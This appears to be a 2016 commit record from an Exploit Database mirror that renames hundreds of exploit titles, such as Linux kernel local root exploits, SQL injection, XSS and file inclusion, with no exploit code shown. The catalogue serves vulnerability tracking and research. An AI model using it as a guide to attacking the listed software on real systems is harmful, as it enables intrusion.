exploit-db-mirror/platforms/windows/dos/40192.py
Offensive Security 1b40ae09d7 DB: 2016-08-02
4 new exploits

ProFTPD 1.2.7 < 1.2.9rc2 - Remote Root & brute-force Exploit
ProFTPD 1.2.7 < 1.2.9rc2 - Remote Root / brute-force Exploit
Linux Kernel 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (1)
Linux Kernel 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (2)
Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (1)
Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (2)

Linux Kernel 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Local Root Exploit (3)
Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Local Root Exploit (3)

Linux Kernel 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Validator (Proof of Concept) (1)
Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (Proof of Concept) (1)

Linux Kernel 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Local Root Exploit (2)
Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Local Root Exploit (2)

Symantec Multiple Firewall DNS Response Denial of Service
Symantec Multiple Firewall - DNS Response Denial of Service

Lexmark Multiple HTTP Servers Denial of Service
Lexmark Multiple HTTP Servers - Denial of Service

BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit
BadBlue 2.52 Web Server - Multiple Connections Denial of Service Exploit

Linux Kernel 2.4.28 / <= 2.6.9 - scm_send Local DoS Exploit
Linux Kernel 2.4.28 / 2.6.9 - scm_send Local DoS Exploit
Linux Kernel 2.6.9 / <= 2.4.28 - vc_resize int Local Overflow Exploit
Linux Kernel 2.6.9 / <= 2.4.28 - Memory Leak Local DoS
Linux Kernel 2.6.9 / <= 2.4.28 - ip_options_get Local Overflow
Linux Kernel 2.4.28 / 2.6.9 - vc_resize int Local Overflow Exploit
Linux Kernel 2.4.28 / 2.6.9 - Memory Leak Local DoS
Linux Kernel 2.4.28 / 2.6.9 - ip_options_get Local Overflow

Linux Kernel 2.6.9 / <= 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Local Root Exploit
Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Local Root Exploit

WebWiz Products 1.0 / <= 3.06 - Login Bypass SQL Injection Exploits
WebWiz Products 1.0 / 3.06 - Login Bypass SQL Injection Exploits

Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit
Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure / Denial of Service Exploit

Fast Click 1.1.3 / <= 2.3.8 - (show.php) Remote File Inclusion Exploit
Fast Click 1.1.3 / 2.3.8 - (show.php) Remote File Inclusion Exploit

Newsscript 0.5 - Remote and Local File Inclusion
Newsscript 0.5 - Remote File Inclusion / Local File Inclusion

Invision Gallery 2.0.7 ReadFile() & SQL Injection Exploit (linux)
Invision Gallery 2.0.7 ReadFile() & SQL Injection Exploit (Linux)

X-Cart ? Multiple Remote File Inclusion
X-Cart - Multiple Remote File Inclusion

Rayzz Script 2.0 - Remote / Local File Inclusion
Rayzz Script 2.0 - Remote File Inclusion / Local File Inclusion

QuickTime 7.4.1 QTPlugin.ocx Multiple Stack Overflow Vulnerabilities
QuickTime 7.4.1 - QTPlugin.ocx Multiple Stack Overflow Vulnerabilities

LookStrike Lan Manager 0.9 - Remote / Local File Inclusion
LookStrike Lan Manager 0.9 - Remote File Inclusion / Local File Inclusion

CMS WebManager-Pro Multiple SQL Injection
CMS WebManager-Pro - Multiple SQL Injection

Facil-CMS 0.1RC Multiple Local File Inclusion
Facil-CMS 0.1RC - Multiple Local File Inclusion

Bea Weblogic Apache Connector - Code Execution and Denial of Service Exploit
Bea Weblogic Apache Connector - Code Execution / Denial of Service Exploit

Nuked-klaN 1.7.7 / <= SP4.4 - Multiple Vulnerabilities
Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities

CafeEngine Multiple SQL Injection
CafeEngine - Multiple SQL Injection

A-Link WL54AP3 and WL54AP2 - CSRF + XSS
A-Link WL54AP3 and WL54AP2 - CSRF / XSS

GS Real Estate Portal Multiple SQL Injection
GS Real Estate Portal - Multiple SQL Injection

FloSites Blog Multiple SQL Injection
FloSites Blog - Multiple SQL Injection

ASP PORTAL Multiple SQL Injection
ASP PORTAL - Multiple SQL Injection

Simple Machines Forum 1.0.13 / <= 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass
Simple Machines Forum 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass

Pligg 9.9.5 - CSRF Protection Bypass and Captcha Bypass
Pligg 9.9.5 - CSRF Protection Bypass / Captcha Bypass

Demium CMS 0.2.1b - Multiple Vulnerabilities and Exploit
Demium CMS 0.2.1b - Multiple Vulnerabilities

Linux Kernel 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit
Linux Kernel 2.6.20 / 2.6.24 / 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit

AudioPLUS 2.00.215 - (.lst & .m3u) Local Buffer Overflow (seh)
AudioPLUS 2.00.215 - (.lst & .m3u) Local Buffer Overflow (SEH)

Linux Kernel 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit
Linux Kernel 2.6.24_16-23 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit

jetty 6.x < 7.x - XSS & Information Disclosure & Injection
jetty 6.x < 7.x - XSS / Information Disclosure / Injection

OpenDocMan 1.2.5 - XSS & SQL injection
OpenDocMan 1.2.5 - XSS / SQL injection

Alteon OS BBI (Nortell) - (XSS and CSR) Multiple Vulnerabilities
Alteon OS BBI (Nortell) - XSS / CSR

Micronet SP1910 Data Access Controller UI XSS & HTML Code Injection
Micronet SP1910 Data Access Controller UI - XSS / HTML Code Injection

Kide Shoutbox 0.4.6 - XSS & AXFR
Kide Shoutbox 0.4.6 - XSS / AXFR

PHP-Nuke 8.0 - XSS & HTML Code Injection in News Module
PHP-Nuke 8.0 - XSS / HTML Code Injection in News Module

Invision Power Board 3.0.4 / <= 3.0.4 / <= 2.3.6 - LFI / SQL Injection
Invision Power Board 3.0.4 / 3.0.4 / 2.3.6 - LFI / SQL Injection

oBlog - Persistant XSS & CSRF & Admin Bruteforce
oBlog - Persistant XSS / CSRF / Admin Bruteforce

WP-Forum 2.3 - SQL Injection & Blind SQL Injection
WP-Forum 2.3 - SQL Injection / Blind SQL Injection

QuickEStore 7.9 - SQL Injection and Path Diclosure Download
QuickEStore 7.9 - SQL Injection / Path Diclosure Download

dotProject 2.1.3 - XSS and Improper Permissions
dotProject 2.1.3 - XSS / Improper Permissions

MOJO's IWms 7 SQL Injection & Cross-Site Scripting
MOJO's IWms 7 - SQL Injection / Cross-Site Scripting

Cisco Collaboration Server 5 - XSS & Source Code Disclosure
Cisco Collaboration Server 5 - XSS / Source Code Disclosure

cPanel Multiple CSRF Vulnerabilities
cPanel - Multiple CSRF Vulnerabilities

(Tod Miller's) Sudo/SudoEdit  <= 1.6.9p21 / <= 1.7.2p4 - Local Root Exploit
(Tod Miller's) Sudo/SudoEdit 1.6.9p21 / 1.7.2p4 - Local Root Exploit

SiteDone Custom Edition 2.0 - SQL Injection & XSS
SiteDone Custom Edition 2.0 - SQL Injection / XSS

TSOKA:CMS 1.1 & 1.9 & 2.0 - SQL Injection & XSS
TSOKA:CMS 1.1 & 1.9 & 2.0 - SQL Injection / XSS

Centreon IT & Network Monitoring 2.1.5 - Injection SQL
Centreon IT & Network Monitoring 2.1.5 - SQL Injection

ilchClan 1.0.5 - (cid) SQL Injection & Exploit
ilchClan 1.0.5 - (cid) SQL Injection

joelz bulletin board 0.9.9rc3 - Multiple SQL Injection & Exploit
joelz bulletin board 0.9.9rc3 - Multiple SQL Injection

2DayBiz Advanced Poll Script - XSS and Authentication Bypass
2DayBiz Advanced Poll Script - XSS / Authentication Bypass

Socialware 2.2 - Upload and XSS
Socialware 2.2 - Upload / XSS

Waibrasil Remote / Local File Inclusion
Waibrasil - Remote File Inclusion / Local File Inclusion

I-Vision CMS - XSS & SQL Injection
I-Vision CMS - XSS / SQL Injection

phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting and Full Path
phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path

3Com* iMC (Intelligent Management Center) - Various XSS and Information Disclosure Flaws
3Com* iMC (Intelligent Management Center) - XSS / Information Disclosure Flaws
WmsCMS - XSS & SQL Injection
iScripts eSwap 2.0 - SQLi and XSS
WmsCMS - XSS / SQL Injection
iScripts eSwap 2.0 - SQLi / XSS
reVou Twitter Clone 2.0 Beta - SQL Injection and XSS
JForum 2.1.8 bookmarks CSRF & XSS
reVou Twitter Clone 2.0 Beta - SQL Injection / XSS
JForum 2.1.8 bookmarks CSRF / XSS
eLms Pro - SQLi and XSS
PGAUTOPro - SQLi and XSS
eLms Pro - SQLi / XSS
PGAUTOPro - SQLi / XSS

Joomla 1.5 Jreservation Component - SQLi And XSS
Joomla 1.5 Jreservation Component - SQLi / XSS

Science Fair In A Box - SQLi & XSS
Science Fair In A Box - SQLi / XSS

PHP Property Rental Script - SQLi & XSS
PHP Property Rental Script - SQLi / XSS

SchoolMation 2.3 - SQLi and XSS
SchoolMation 2.3 - SQLi / XSS

UTStats - XSS & SQL Injection & Full path disclosure
UTStats - XSS / SQL Injection / Full path disclosure

SimpleAssets Authentication Bypass & XSS
SimpleAssets Authentication Bypass / XSS

InterScan Web Security 5.0 - Arbitrary File Upload & Local Privilege Escalation
InterScan Web Security 5.0 - Arbitrary File Upload / Local Privilege Escalation

ARSC Really Simple Chat 3.3 - Remote File Inclusion & XSS
ARSC Really Simple Chat 3.3 - Remote File Inclusion / XSS

Pre Multi-Vendor Shopping Malls SQL Injection & Auth Bypass
Pre Multi-Vendor Shopping Malls SQL Injection / Auth Bypass

Zylone IT Multiple Blind SQL Injection
Zylone IT - Multiple Blind SQL Injection

vBulletin 3.8.4 & 3.8.5 Registration Bypass
vBulletin 3.8.4 / 3.8.5 Registration Bypass

JaWiki 'versionNo' Parameter Cross Site Scripting
JaWiki 'versionNo' Parameter Cross-Site Scripting

411cc Multiple SQL Injection
411cc - Multiple SQL Injection

MantisBT 1.2.3 (db_type) - Cross-Site Scripting & Path Disclosure
MantisBT 1.2.3 (db_type) - Cross-Site Scripting / Path Disclosure

OpenEMR 3.2.0 - SQL Injection and XSS
OpenEMR 3.2.0 - SQL Injection / XSS
F3Site 2011 alfa 1 - (XSS & CSRF) Multiple Vulnerabilities
phpMySport 1.4 - (SQLi & Auth Bypass & Path Disclosure) Multiple Vulnerabilities
F3Site 2011 alfa 1 - (XSS / CSRF) Multiple Vulnerabilities
phpMySport 1.4 - SQLi / Auth Bypass / Path Disclosure

WordPress Plugin BackWPup - Remote and Local Code Execution
WordPress Plugin BackWPup - Remote Code Execution /Local Code Execution

Planex Mini-300PU & Mini100s Cross-Site Scripting
Planex Mini-300PU & Mini100s - Cross-Site Scripting

TinyBB 1.4 - Blind SQL Injection and Path Disclosure
TinyBB 1.4 - Blind SQL Injection / Path Disclosure

Linux Kernel 2.6.28 / <= 3.0 (DEC Alpha Linux) - Local Root Exploit
Linux Kernel 2.6.28 / 3.0 (DEC Alpha Linux) - Local Root Exploit

If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit  (Metasploit) (2)
If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (Metasploit) (2)

Webcat Multiple Blind SQL Injection
Webcat - Multiple Blind SQL Injection

Banana Dance CMS and Wiki SQL Injection
Banana Dance CMS and Wiki - SQL Injection

SMF 2.0.1 - SQL Injection & Privilege Escalation
SMF 2.0.1 - SQL Injection / Privilege Escalation

Linux/x86 - Polymorphic Shellcode setuid(0) + setgid(0) + add user _iph_  without password to /etc/passwd
Linux/x86 - Polymorphic Shellcode setuid(0) + setgid(0) + add user _iph_ without password to /etc/passwd

Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities

phpList 2.10.17 - SQL Injection and XSS
phpList 2.10.17 - SQL Injection / XSS

vBshop Multiple Persistent XSS Vulnerabilities
vBshop - Multiple Persistent XSS Vulnerabilities

ArticleSetup Multiple Persistence Cross-Site Scripting and SQL Injection
ArticleSetup - Multiple Persistence Cross-Site Scripting / SQL Injection

Serendipity 1.6 - Backend XSS And SQLi
Serendipity 1.6 - Backend XSS / SQLi

Wireshark Multiple Dissector Denial of Service Vulnerabilities
Wireshark - Multiple Dissector Denial of Service Vulnerabilities

Useresponse 1.0.2 - Privilege Escalation & RCE Exploit
Useresponse 1.0.2 - Privilege Escalation / RCE Exploit

Linux Kernel 2.2/2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options
Linux Kernel 2.2 / 2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options
AlienVault OSSIM 3.1 - Reflected XSS and Blind SQL Injection
Spiceworks 5.3.75941 - Stored XSS and Post-Auth SQL Injection
AlienVault OSSIM 3.1 - Reflected XSS / Blind SQL Injection
Spiceworks 5.3.75941 - Stored XSS / Post-Auth SQL Injection

T-dah Webmail CSRF & Stored XSS
T-dah Webmail - CSRF / Stored XSS

XODA Document Management System 0.4.5 - XSS & Arbitrary File Upload
XODA Document Management System 0.4.5 - XSS / Arbitrary File Upload

WireShark 1.8.2 & 1.6.0 - Buffer Overflow PoC (0Day)
WireShark 1.8.2 / 1.6.0 - Buffer Overflow PoC (0Day)

businesswiki 2.5rc3 - Stored XSS & arbitrary file upload
businesswiki 2.5rc3 - Stored XSS / arbitrary file upload

SpyNet 6.5 Chat Server Multiple Connection Denial of Service
SpyNet 6.5 Chat Server - Multiple Connection Denial of Service

Exploit: NCMedia Sound Editor Pro 7.5.1 - (SEH + DEP Bypass)
NCMedia Sound Editor Pro 7.5.1 - (SEH + DEP Bypass)

Mozilla Bonsai Multiple Cross-Site Scripting Vulnerabilities
Mozilla Bonsai - Multiple Cross-Site Scripting Vulnerabilities

airVisionNVR 1.1.13 readfile() Disclosure and SQL Injection
airVisionNVR 1.1.13 - readfile() Disclosure / SQL Injection

BRS WebWeaver 1.0 4 POST and HEAD Denial of Service
BRS WebWeaver 1.0 4 - POST and HEAD Denial of Service

Caucho Resin 2.0/2.1 - Multiple HTML Injection and Cross-Site Scripting Vulnerabilities
Caucho Resin 2.0/2.1 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities

MyDms 1.4 - SQL Injection And Directory Traversal
MyDms 1.4 - SQL Injection / Directory Traversal

D-Link DIR-600 and DIR-300 - (rev B) Multiple Vulnerabilities
D-Link DIR-600 and DIR-300 (rev B) - Multiple Vulnerabilities

D'Link DIR-615 Hardware rev D3 / DIR-300 - Hardware rev A Multiple Vulnerabilities
D'Link DIR-615 Hardware rev D3 / DIR-300 Hardware rev A - Multiple Vulnerabilities

Linux Kernel 2.6.x (RHEL4 <= 2.6.9 / <= 2.6.11) - SYS_EPoll_Wait Local Integer Overflow Local Root (2)
Linux Kernel 2.6.9 /2.6.11 (RHEL4) - SYS_EPoll_Wait Local Integer Overflow Local Root (2)

Linux Kernel 2.4.30 / <= 2.6.11.5 - Bluetooth bluez_sock_create Local Root
Linux Kernel 2.4.30 / 2.6.11.5 - Bluetooth bluez_sock_create Local Root

CKEditor < 4.1 - Persistent XSS WYSIWYG module Drupal 6.x & 7.x
CKEditor < 4.1WYSIWYG module Drupal 6.x & 7.x - Persistent XSS

OSTicket 1.2/1.3 - Multiple Input Validation and Remote Code Injection Vulnerabilities
OSTicket 1.2/1.3 - Multiple Input Validation / Remote Code Injection Vulnerabilities
Calendarix 0.8.20071118 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
MyBB - Multiple Cross-Site Scripting and SQL Injection
Calendarix 0.8.20071118 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities
MyBB - Multiple Cross-Site Scripting / SQL Injection

YaPiG 0.9x - Remote and Local File Inclusion
YaPiG 0.9x - Remote File Inclusion / Local File Inclusion

ATutor 1.4.3 tile.php Multiple Parameter XSS
ATutor 1.4.3 - tile.php Multiple Parameter XSS

CarLine Forum Russian Board 4.2 menu_footer.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 - menu_footer.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 menu_header.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 menu_tema.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 - menu_header.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 - menu_tema.php Multiple Parameter XSS

CarLine Forum Russian Board 4.2 reply.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 - reply.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 new.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 edit_msg.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 - new.php Multiple Parameter XSS
CarLine Forum Russian Board 4.2 - edit_msg.php Multiple Parameter XSS

CarLine Forum Russian Board 4.2 reply_in.php Multiple Parameter SQL Injection
CarLine Forum Russian Board 4.2 - reply_in.php Multiple Parameter SQL Injection
CarLine Forum Russian Board 4.2 memory.php Multiple Parameter SQL Injection
CarLine Forum Russian Board 4.2 line.php Multiple Parameter SQL Injection
CarLine Forum Russian Board 4.2 in.php Multiple Parameter SQL Injection
CarLine Forum Russian Board 4.2 enter.php Multiple Parameter SQL Injection
CarLine Forum Russian Board 4.2 - memory.php Multiple Parameter SQL Injection
CarLine Forum Russian Board 4.2 - line.php Multiple Parameter SQL Injection
CarLine Forum Russian Board 4.2 - in.php Multiple Parameter SQL Injection
CarLine Forum Russian Board 4.2 - enter.php Multiple Parameter SQL Injection

ASPNuke 0.80 register.asp Multiple Parameter XSS
ASPNuke 0.80 - register.asp Multiple Parameter XSS
Binary Board System 0.2.5 reply.pl Multiple Parameter XSS
Binary Board System 0.2.5 stats.pl Multiple Parameter XSS
Binary Board System 0.2.5 - reply.pl Multiple Parameter XSS
Binary Board System 0.2.5 - stats.pl Multiple Parameter XSS

ZixForum 1.12 Forum.ASP Multiple SQL Injection
ZixForum 1.12 - Forum.ASP Multiple SQL Injection

QNX 6.2/6.3 - Multiple Local Privilege Escalation and Denial of Service Vulnerabilities
QNX 6.2/6.3 - Multiple Local Privilege Escalation / Denial of Service Vulnerabilities

Web-APP.net WebAPP 0.9.x index.cgi Multiple Parameter XSS
Web-APP.net WebAPP 0.9.x - index.cgi Multiple Parameter XSS

IntelliLink Pro 5.06 edit.cgi Multiple Parameter XSS
IntelliLink Pro 5.06 - edit.cgi Multiple Parameter XSS
xFlow 5.46.11 index.cgi Multiple Parameter SQL Injection
xFlow 5.46.11 index.cgi Multiple Parameter XSS
xFlow 5.46.11 - index.cgi Multiple Parameter SQL Injection
xFlow 5.46.11 - index.cgi Multiple Parameter XSS

zenphoto 0.9/1.0 index.php Multiple Parameter XSS
zenphoto 0.9/1.0 - index.php Multiple Parameter XSS

ATutor 1.5.x create_course.php Multiple Parameter XSS
ATutor 1.5.x - create_course.php Multiple Parameter XSS

BlaBla 4U Multiple Cross-Site Scripting Vulnerabilities
BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities

Apache HTTP Server 1.3.35 / <= 2.0.58 / <= 2.2.2 - Arbitrary HTTP Request Headers Security Weakness
Apache HTTP Server 1.3.35 / 2.0.58 / 2.2.2 - Arbitrary HTTP Request Headers Security Weakness

WWWThreads 5.4 Cat Parameter Multiple Cross-Site Scripting Vulnerabilities
WWWThreads 5.4 - Cat Parameter Multiple Cross-Site Scripting Vulnerabilities

AckerTodo 4.2 Login.php Multiple SQL Injection
AckerTodo 4.2 - Login.php Multiple SQL Injection
ac4p Mobile index.php Multiple Parameter XSS
ac4p Mobile MobileNews.php Multiple Parameter XSS
ac4p Mobile - index.php Multiple Parameter XSS
ac4p Mobile - MobileNews.php Multiple Parameter XSS

ac4p Mobile up.php Multiple Parameter XSS
ac4p Mobile - up.php Multiple Parameter XSS

AShop Deluxe 4.5 ashop/catalogue.php Multiple Parameter XSS
AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter XSS

AShop Deluxe 4.5 shipping.php Multiple Parameter XSS
AShop Deluxe 4.5 - shipping.php Multiple Parameter XSS

212cafeBoard Multiple Cross-Site Scripting Vulnerabilities
212cafeBoard - Multiple Cross-Site Scripting Vulnerabilities

Coppermine Photo Gallery 1.4.10 - Multiple Remote And Local File Inclusion
Coppermine Photo Gallery 1.4.10 - Multiple Remote File Inclusion / Local File Inclusion

Atom PhotoBlog 1.0.1/1.0.9AtomPhotoBlog.php Multiple Input Validation Vulnerabilities
Atom PhotoBlog 1.0.1/1.0.9 - AtomPhotoBlog.php Multiple Input Validation Vulnerabilities

PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass and Multiple SQL Injection
PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injection

WordPress Plugin DZS Video Gallery 3.1.3 - Remote and Local File Disclosure
WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure

ACG News 1.0 index.php Multiple SQL Injection
ACG News 1.0 - index.php Multiple SQL Injection

Add a link 4 - Security Bypass and SQL Injection
Add a link 4 - Security Bypass / SQL Injection

AlienVault OSSIM SQL Injection and Remote Code Execution
AlienVault OSSIM - SQL Injection / Remote Code Execution

bttlxe Forum 2.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
bttlxe Forum 2.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities

Neuron News 1.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
Neuron News 1.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities

Clever Copy 3.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
Clever Copy 3.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities

Cells Blog 3.3 - XSS Reflected & Blind SQLite Injection
Cells Blog 3.3 - XSS Reflected / Blind SQLite Injection

ProjectPier 0.8 - Multiple HTML Injection and Cross-Site Scripting Vulnerabilities
ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities

MyBlog 1.x - SQL Injection and Remote File Inclusion
MyBlog 1.x - SQL Injection / Remote File Inclusion

PHP Classifieds 6.20 - Multiple Cross-Site Scripting and Authentication Bypass Vulnerabilities
PHP Classifieds 6.20 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities

Kloxo - SQL Injection and Remote Code Execution
Kloxo - SQL Injection / Remote Code Execution

PHP Address Book 3.1.5 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
PHP Address Book 3.1.5 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities

GL-SH Deaf Forum 6.5.5 - Cross-Site Scripting and Arbitrary File Upload
GL-SH Deaf Forum 6.5.5 - Cross-Site Scripting / Arbitrary File Upload

couponPHP CMS 1.0 - Multiple Stored XSS and SQL Injection
couponPHP CMS 1.0 - Multiple Stored XSS / SQL Injection
EasyDynamicPages 3.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
EasyPublish 3.0 - 'read' Parameter Multiple SQL Injection and Cross-Site Vulnerabilities
EasyDynamicPages 3.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities
EasyPublish 3.0 - 'read' Parameter Multiple SQL Injection / Cross-Site Scripting

EasyE-Cards 3.10 - (SQL Injection and Cross-Site Scripting) Multiple Vulnerabilities
EasyE-Cards 3.10 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities

dotProject 2.1.2 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
dotProject 2.1.2 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities

@Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting Vulnerabilities
@Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting

DHCart 3.84 - Multiple Cross-Site Scripting And HTML Injection Vulnerabilities
DHCart 3.84 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

KDE Konqueror 4.1 - Multiple Cross-Site Scripting and Denial of Service Vulnerabilities
KDE Konqueror 4.1 - Multiple Cross-Site Scripting / Denial of Service Vulnerabilities

4CMS - SQL Injection and Local File Inclusion
4CMS - SQL Injection / Local File Inclusion

PTCeffect 4.6 - LFI & SQL Injection
PTCeffect 4.6 - LFI / SQL Injection

010 Editor 3.0.4 File Parsing Multiple Buffer Overflow Vulnerabilities
010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities

DWebPro 6.8.26 - Directory Traversal and Arbitrary File Disclosure
DWebPro 6.8.26 - Directory Traversal / Arbitrary File Disclosure

Kingsoft Webshield 1.1.0.62 - Cross-Site scripting and Remote Command Execution
Kingsoft Webshield 1.1.0.62 - Cross-Site scripting / Remote Command Execution

LxBlog Multiple Cross-Site Scripting and SQL Injection
LxBlog Multiple Cross-Site Scripting / SQL Injection

Joomla! < 1.5.11 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
Joomla! < 1.5.11 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

PhotoPost PHP 3.3.1 - 'cat' Parameter Cross-Site Scripting and SQL Injection
PhotoPost PHP 3.3.1 - 'cat' Parameter Cross-Site Scripting / SQL Injection

Natychmiast CMS - Multiple Cross-Site Scripting and SQL Injection
Natychmiast CMS - Multiple Cross-Site Scripting / SQL Injection

e107 0.7.x - ('CAPTCHA' Security Bypass and Cross-Site Scripting) Multiple Vulnerabilities
e107 0.7.x - ('CAPTCHA' Security Bypass / Cross-Site Scripting) Multiple Vulnerabilities
Achievo 1.x - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
Dream Poll 3.1 - 'index.php' Cross-Site Scripting and SQL Injection
Achievo 1.x - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities
Dream Poll 3.1 - 'index.php' Cross-Site Scripting / SQL Injection

Pentaho BI 1.x - Multiple Cross-Site Scripting and Information Disclosure Vulnerabilities
Pentaho BI 1.x - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities

Oracle E-Business Suite 11i Multiple Remote Vulnerabilities
Oracle E-Business Suite 11i - Multiple Remote Vulnerabilities

Photokorn 1.542 - Cross-Site Scripting and Remote File Inclusion
Photokorn 1.542 - Cross-Site Scripting / Remote File Inclusion

dotProject 2.1.3 - Multiple SQL Injection and HTML Injection Vulnerabilities
dotProject 2.1.3 - Multiple SQL Injection / HTML Injection Vulnerabilities

Linux Kernel 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Root Exploit (3)
Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Root Exploit (3)

Kempt SiteDone 2.0 - 'detail.php' Cross-Site Scripting and SQL Injection
Kempt SiteDone 2.0 - 'detail.php' Cross-Site Scripting / SQL Injection

Lunar CMS 3.3 - CSRF And Stored XSS
Lunar CMS 3.3 - CSRF / Stored XSS

NovaSTOR NovaNET 11.0 - Remote DoS and arbitrary memory read
NovaSTOR NovaNET 11.0 - Remote DoS / arbitrary memory read

NolaPro Enterprise 4.0.5538 - Cross-Site Scripting and SQL Injection
NolaPro Enterprise 4.0.5538 - Cross-Site Scripting / SQL Injection

Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting and SQL Injection
Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting / SQL Injection

Omeka 2.2 - CSRF And Stored XSS
Omeka 2.2 - CSRF / Stored XSS

Oxwall 1.7.0 - Multiple CSRF And HTML Injection Vulnerabilities
Oxwall 1.7.0 - Multiple CSRF / HTML Injection Vulnerabilities

SkaDate Lite 2.0 - Multiple CSRF And Persistent XSS Vulnerabilities
SkaDate Lite 2.0 - Multiple CSRF / Persistent XSS Vulnerabilities

Disqus for WordPress 2.7.5 - Admin Stored CSRF and XSS
Disqus for WordPress 2.7.5 - Admin Stored CSRF / XSS

PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting and HTML Injection Vulnerabilities
PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection Vulnerabilities

Cetera eCommerce Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
Cetera eCommerce - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

Allinta CMS 22.07.2010 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
Allinta CMS 22.07.2010 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities

Nagios XI Multiple Cross-Site Request Forgery Vulnerabilities
Nagios XI 0 Multiple Cross-Site Request Forgery Vulnerabilities

JBoard Multiple Cross-Site Scripting and SQL Injection
JBoard Multiple Cross-Site Scripting / SQL Injection

ServletExec - (Directory Traversal and Authentication-Bypass) Multiple Vulnerabilities
ServletExec - (Directory Traversal / Authentication-Bypass) Multiple Vulnerabilities

123 Flash Chat Multiple Security Vulnerabilities
123 Flash Chat = Multiple Security Vulnerabilities

CompuCMS - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
